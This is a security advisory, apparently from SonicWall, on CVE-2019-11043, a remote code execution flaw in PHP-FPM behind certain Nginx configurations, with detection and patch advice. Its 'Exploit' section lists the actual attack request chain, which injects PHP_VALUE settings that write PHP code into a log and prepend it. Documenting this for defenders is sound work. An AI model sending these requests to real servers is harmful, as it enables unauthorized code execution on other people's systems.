PHP-FPM Vulnerability leads to Remote code execution

November 4, 2019

PHP-FPM (PHP Fast Process Manager) is a FastCGI handler for PHP scripts and applications, especially useful for busier sites. It’s commonly paired with web servers to serve applications which require a PHP framework, such as web forums or login gateways, while the web server returns HTML, JavaScript, and other non-PHP content.

FastCGI is a way to have CGI scripts execute time-consuming code (like opening a database) only once, rather than every time the script is loaded. It mainly helps to reduce the overhead related to interfacing between web server and CGI programs, allowing a server to handle more web page requests per unit of time.

Vulnerability | CVE-2019-11043
This vulnerability can be triggered only with the following Nginx configurations and only when NGINX is paired with PHP-FPM.  It allows the  FPM module to write past allocated buffers into the space reserved for FCGI protocol data, thus opening the possibility of remote code execution.

location ~ [^/]\.php(/|$) {
                  fastcgi_split_path_info ^(.+?\.php)(/.*)$;
                  fastcgi_param PATH_INFO $fastcgi_path_info;
                  fastcgi_pass php:9000;
                  …

The regexp in `fastcgi_split_path_info` directive can be broken using the newline character (%0a, in url encoded form). Broken regexp leads to empty PATH_INFO. While php-fpm handling PATH_INFO as empty, there is a logical flaw allowing attackers to create fake PHP_VALUE variables. Using this technique, attackers can create a chain of carefully chosen config values to get remote code execution.

Exploit:

The attacker’s requests look like the below ones:

GET /index.php/PHP_VALUE%0Asession.auto_sart=0;;;;
GET /index.php/PHP_VALUE%0Ahtml_errors=0;;;;;;;;;;
GET /index.php/PHP_VALUE%0Ainclude_path=/tmp;;;;;;
GET /index.php/PHP_VALUE%0Aauto_prepend_file=a;;;;
GET /index.php/PHP_VALUE%0Alog_errors=1;;;;;;;;;;;
GET /index.php/PHP_VALUE%0Aerror_reporting=2;;;;;;
GET /index.php/PHP_VALUE%0Aerror_log=/tmp/a;;;;;;;
GET /index.php/PHP_VALUE%0Aextension_dir=%22%3C%3F
GET /index.php/PHP_VALUE%0Aextension=%22$_GET%5Ba%

Fix:

Admins are advised to check whether their servers are vulnerable by executing a simple bash command:
                  egrep -Rin –color ‘fastcgi_split_path’ /etc/nginx/

It is recommended to upgrade to the patched release (or later) of your PHP version

SonicWALL Capture Labs Threat Research team provides protection against this threat with the following signature:

          IPS 14523: PHP-FPM NGINX Remote Code Execution

SonicWall WAF has been designed to provide protection against this exploit by default.